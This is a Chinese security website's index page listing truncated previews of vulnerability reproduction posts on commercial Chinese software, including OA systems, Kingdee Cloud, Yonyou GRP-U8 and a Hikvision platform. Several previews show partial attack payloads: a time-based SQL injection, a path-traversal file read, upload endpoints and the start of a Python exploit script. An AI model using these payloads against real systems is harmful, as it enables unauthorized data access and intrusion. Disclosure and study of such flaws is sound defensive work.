安全漏洞 - 第 258 | CN-SEC 中文网

livenvr-青柿视频管理系统-PermissionAC

L16-1livenvr-青柿视频管理系统-PermissionAC 漏洞复现： paylaod1 payload： GET /api/v1/device/channeltree?serial=&am...

07月26日安全漏洞27 views已关闭评论

阅读全文

科荣-AIO-SQL

K1-5科荣-AIO-SQL 漏洞复现： payload： GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:5'--&...

07月26日安全漏洞11 views已关闭评论

阅读全文

金蝶-云星空-SQL

J8-14金蝶-云星空-SQL 漏洞复现： payload： /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.Account.AccountServic...

07月26日安全漏洞127 views已关闭评论

阅读全文

九思-OA-任意文件上传

J5-3九思-OA-任意文件上传漏洞复现： payload： /jsoa/wpsforlinux/src/upload_l.jsp?openType=

07月26日安全漏洞163 views已关闭评论

阅读全文

安全漏洞

金慧-综合管理信息系统-SQL

J33-1金慧-综合管理信息系统-SQL 漏洞描述：由于金慧-综合管理信息系统 LoginBegin.aspx（登录接口处）没有对外部输入的SQL语句进行严格的校验和过滤，直接带入数据库执行，导致未...

07月26日71 views已关闭评论

阅读全文

安全漏洞

华天动力-OA-任意文件读取

H18-4华天动力-OA-任意文件读取漏洞复现： payload： GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../hto...

07月26日41 views已关闭评论

阅读全文

广州图创-图书馆集群管理系统-PermissionAC

G2-3广州图创-图书馆集群管理系统-PermissionAC 漏洞复现： payload： /interlibSSO/api/BrowseLogInterface?cmdACT=doDataFlow...

07月26日安全漏洞102 views已关闭评论

阅读全文

安全漏洞

百易云-资产管理运营系统-任意文件上传

B11-1百易云-资产管理运营系统-任意文件上传漏洞描述：百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而...

07月26日63 views已关闭评论

阅读全文

安全漏洞

技术分享 | 迅饶科技 X2Modbus 网关 GetUser 信息泄露漏洞

一、漏洞描述 X2Modbus网关GetUser接口存存在信息泄露漏洞，未经身份验证的攻击者可利用此漏洞获取管理员账号密码等凭证信息登录后台，使系统处于极不安全的状态。二、复现过程 Fafo：ser...

07月26日31 views评论

阅读全文

安全漏洞

用友 GRP-U8 U8SMSProxy SQL注入漏洞

漏洞描述用友 GRP-U8 U8SMSProxy 接口存在一个 SQL 注入漏洞，通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权，从而...

07月26日37 views评论

阅读全文

安全漏洞

HIKVISION -- 综合安防管理平台env信息泄漏

0x01 工具介绍综合安防管理平台env信息泄漏。 0x02 安装与使用界面展示 0x03 下载链接 import argparse,requests,sys,re,os,time # 导包 fr...

07月26日47 views评论

阅读全文